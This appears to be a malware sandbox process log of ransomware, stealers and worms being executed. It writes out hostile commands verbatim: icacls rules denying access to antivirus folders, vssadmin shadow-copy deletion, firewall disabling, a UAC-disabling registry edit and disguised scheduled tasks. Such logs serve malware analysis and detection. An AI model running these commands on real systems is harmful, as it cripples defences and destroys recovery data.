C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 12⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d020dd71608d4f7f9ff51092e4c815c8 /t 3044 /p 30481⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"2⤵
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"2⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\TheG0df2ther@Emotet.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"2⤵
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.exe@24163⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll,f04⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\RedEye.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\RedEye.exe"2⤵
- Modifies extensions of user files
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\NetSh.exeNetSh Advfirewall set allprofiles state off3⤵
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -r -t 00 -f3⤵
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_489307f4.bat"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\fcIYAMws\PioYkUIY.exe"C:\Users\Admin\fcIYAMws\PioYkUIY.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
-
C:\ProgramData\PEkMcMgI\LSwIgkAg.exe"C:\ProgramData\PEkMcMgI\LSwIgkAg.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 23⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 13⤵
- Modifies registry key
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"2⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 153⤵
- Drops file in Windows directory
-
C:\Windows\1030.tmp"C:\Windows\1030.tmp" \\.\pipe\{7869F017-81C1-410F-97B3-05144B1A9851}4⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"2⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 153⤵
- Drops file in Windows directory
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Fantom.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Fantom.exe"2⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\GandCrab.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\GandCrab.exe"2⤵
- Drops startup file
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Checks processor information in registry
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe"2⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Checks processor information in registry
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\mobsync.exeC:\Windows\System32\mobsync.exe -Embedding1⤵
- Executes dropped EXE
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list1⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK1⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)1⤵
- Modifies file permissions
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
